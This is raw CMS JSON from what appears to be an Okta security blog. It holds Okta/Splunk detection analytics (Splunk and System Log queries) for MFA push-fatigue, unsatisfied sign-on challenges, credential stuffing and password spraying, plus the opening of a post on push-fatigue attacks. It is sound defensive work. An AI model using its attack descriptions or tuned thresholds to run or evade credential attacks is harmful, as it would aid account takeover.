\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Retrieves policy evaluation and SSO details in events that contain the Application requested\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Formats target fields so we can aggregate specifically on Applications (AppInstances)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Groups by User, Session and IP\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creates a ratio of successful SSO events to total MFA challenges related to Application Sign On Policies\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Alerts when more than half of app sign on events are unsuccessful, and challenges were unsatisfied for more than three apps.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"index=main sourcetype=oktaim2:log target{}.type=AppInstance (eventType=policy.evaluate_sign_on outcome.result=CHALLENGE) OR (eventType=user.authentication.sso outcome.result=SUCCESS) \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" | eval targets=mvzip('target{}.type', 'target{}.displayName', \\\": \\\")\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" | eval targets=mvfilter(targets LIKE \\\"AppInstance%\\\")\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" ```Stats per user/session/ip/target app```\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" | stats count min(_time) as _time values(outcome.result) as outcome.result dc(eval(if(eventType=\\\"policy.evaluate_sign_on\\\",targets,NULL))) as total_challenges sum(eval(if(eventType=\\\"user.authentication.sso\\\",1,0))) as total_successes \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" by authenticationContext.externalSessionId targets actor.alternateId client.ipAddress\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" ```Exclude apps that don't require a challenge```\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" | search total_challenges > 0\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" ```Group events by session/actor/ip```\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" | stats min(_time) as _time values(*) as * sum(total_challenges) as total_challenges sum(total_successes) as total_successes values(eval(if('outcome.result'=\\\"SUCCESS\\\",targets,NULL))) as success_apps values(eval(if('outcome.result'!=\\\"SUCCESS\\\",targets,NULL))) as no_success_apps by authenticationContext.externalSessionId actor.alternateId client.ipAddress\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" | fillnull\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" | eval ratio=round(total_successes/total_challenges,2), severity=\\\"HIGH\\\", mitre_technique_id=\\\"T1538\\\", description='actor.alternateId'. \\\" from \\\" . 'client.ipAddress' . \\\" seen opening \\\" . total_challenges . \\\" chiclets/apps with \\\" . total_successes . \\\" challenges successfully passed\\\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" | fields - count, targets\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" ```Assuming a majority of apps have good sign-on policies, if we see three apps with ignored challenges, that's worth investigating```\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" | search ratio < 0.5 total_challenges > 2\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk Analytic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://research.splunk.com/application/1c21fed1-7000-4a2e-9105-5aaafa437247/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"1c21fed1-7000-4a2e-9105-5aaafa437247 \",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Mismatch Between Source and Response for Verify Push Request\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1621\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1621\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tactic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multi-Factor Authentication Request Generation\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authors\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"John Murphy and\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Jordan Ruocco (Okta)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A detection opportunity arises when an adversary that has stolen a user password attempts to trick a user into accepting a Okta Verify Push request.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The following analytic identifies variations in client-based values for source and response events to identify suspicious request behavior. The detection is enhanced if the org is evaluating behavior conditions in sign-on policies using Okta Behavior Detection.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The query below: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Groups by SessionID and retrieves any system.push.send_factor_verify_push events (the source of the push) and user.authentication.auth_via_mfa events where the factor is OKTA_VERIFY_PUSH - (the user response to the push)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Counts the total number of push events, successful authentication events, and any push sources where the client is a new device.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creates a ratio of successful sign-ins to pushes. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If the ratio (currently tuned aggressively) indicates push spam, or if a user has rejected a push, the detection proceeds to evaluate whether there is more than one IP address used during the session (session roaming) and the presence of both a new IP and new device during the session.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"index=main sourcetype=OktaIM2:log eventType IN (system.push.send_factor_verify_push) OR (eventType IN (user.authentication.auth_via_mfa) debugContext.debugData.factor=\\\"OKTA_VERIFY_PUSH\\\")\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| eval groupby='authenticationContext.externalSessionId'\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" ``` Each push is sent to each registered push device, so we should group pushes around the same time as a single event for the purpose of this use-case ``` \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| eval group_push_time=_time \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| bin span=2s group_push_time \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| fillnull value=NULL \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| stats min(_time) as _time by authenticationContext.externalSessionId eventType debugContext.debugData.factor outcome.result actor.alternateId client.device client.ipAddress client.userAgent.rawUserAgent debugContext.debugData.behaviors group_push_time groupby\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| iplocation client.ipAddress\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| fields - lat, lon, group_push_time\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" ```Get counts for number of push events, successful authentication events, and any push sources where the client is a new device ``` \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| stats min(_time) as _time dc(client.ipAddress) as dc_ip \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" sum(eval(if(eventType=\\\"system.push.send_factor_verify_push\\\" AND 'outcome.result'=\\\"SUCCESS\\\",1,0))) as total_pushes \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" sum(eval(if(eventType=\\\"user.authentication.auth_via_mfa\\\" AND 'outcome.result'=\\\"SUCCESS\\\",1,0))) as total_successes \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" sum(eval(if(eventType=\\\"user.authentication.auth_via_mfa\\\" AND 'outcome.result'=\\\"FAILURE\\\",1,0))) as total_rejected \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" sum(eval(if(eventType=\\\"system.push.send_factor_verify_push\\\" AND 'debugContext.debugData.behaviors' LIKE \\\"%New Device=POSITIVE%\\\",1,0))) as suspect_device_from_source \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" sum(eval(if(eventType=\\\"system.push.send_factor_verify_push\\\" AND 'debugContext.debugData.behaviors' LIKE \\\"%New IP=POSITIVE%\\\",1,0))) as suspect_ip_from_source \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" values(eval(if(eventType=\\\"system.push.send_factor_verify_push\\\",'client.ipAddress',\\\"\\\"))) as src \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" values(eval(if(eventType=\\\"user.authentication.auth_via_mfa\\\",'client.ipAddress',\\\"\\\"))) as dest \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" values(*) as * by groupby \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| eval ratio = round(total_successes/total_pushes,2)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" ```Create a ratio of successful sign ins to pushes. If the push and response come from the same IP, it's likely legit. Note that the current ratio is quite aggressive. Aside from tuning the ratio you could add other conditions, for example: dc Country > 1, other behaviors (NEW Geo-Location=POSITIVE), device.managed=false, client.os!={SOE_OS}```\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| search ((ratio < 0.5 AND total_pushes > 2) OR (total_rejected > 0)) AND dc_ip > 1 AND suspect_device_from_source > 0 AND suspect_ip_from_source > 0\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk Analytic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://research.splunk.com/application/8085b79b-9b85-4e67-ad63-351c9e9a5e9a/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"8085b79b-9b85-4e67-ad63-351c9e9a5e9a\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight Alert: Login Failure with High Unknown Users\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/004/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110.004\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tactic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Brute Force: Credential Stuffing\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta provides a platform detection for multiple login failures with high unknown user counts from the same IP across one or more Okta orgs. More info \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"here\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.detected\\\" AND outcome.reason co \\\"Login failures with high unknown users count\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk Analytic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://research.splunk.com/application/632663b0-4562-4aad-abe9-9f621a049738/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"632663b0-4562-4aad-abe9-9f621a049738\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight Alert: Suspected Password Spray Attack\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/003/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110.003\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tactic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Brute Force: Password Spray\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta provides a platform detection for failed password events across multiple user accounts. More info \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"here\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.detected\\\" AND outcome.reason co \\\"Password Spray\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk Analytic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://research.splunk.com/application/25dbad05-6682-4dd5-9ce9-8adecf0d9ae2/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"25dbad05-6682-4dd5-9ce9-8adecf0d9ae2\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Magic like this happens when best-in-class providers of security tools share knowledge, without any agenda outside of protecting our mutual customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A huge thanks to the authors and contributors in this initial effort:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"James Brodsky (Splunk)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Scott Dermott (Okta)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Michael Haag (Splunk)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"John Murphy (Okta)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Felicity Robson (Okta)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Jordan Ruocco (Okta)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To learn more, Splunk and Okta are hosting a joint session at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://conf.splunk.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\".conf23\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", the annual Splunk conference, scheduled for July 17-20, 2023 in Las Vegas.\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T18:48:30.571Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"},{"id":"40144a58-c93f-5b84-895a-5658f212b168","bio":{"bio":"The Defensive Cyber Operations (DCO) team is responsible for detecting and responding to cyber threats that impact Okta or our customers via the Okta platform. Our intelligence-driven capability identifies the adversaries most likely to impact Okta and our customers, and prioritises our defensive capabilities based on the threats most likely to be realised.
"},"image":null,"name":"Defensive Cyber Operations","jobTitle":"","slug":"defensive-cyber-operations","node_locale":"en"}]},{"slug":"/pushfatigueworkflows","id":"62442b90-3fdb-5a1e-9122-e58f0eb81b96","title":"Using Workflows to Respond to Anomalous Push Requests","date":"2023-04-24T05:57:22+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“Push fatigue” is a noisy form of attack that generates numerous detection opportunities.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In a “push fatigue” attack (sometimes called “MFA bombing”), an attacker already in possession of a user password triggers push notifications, often in rapid succession, to trick or frustrate the legitimate user into allowing access. The attacker gains unauthorized access to the account if the user approves the request out of habit or under the assumption of system error.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The most strategic, long-term way to counter these attacks (and many others) is to migrate users to 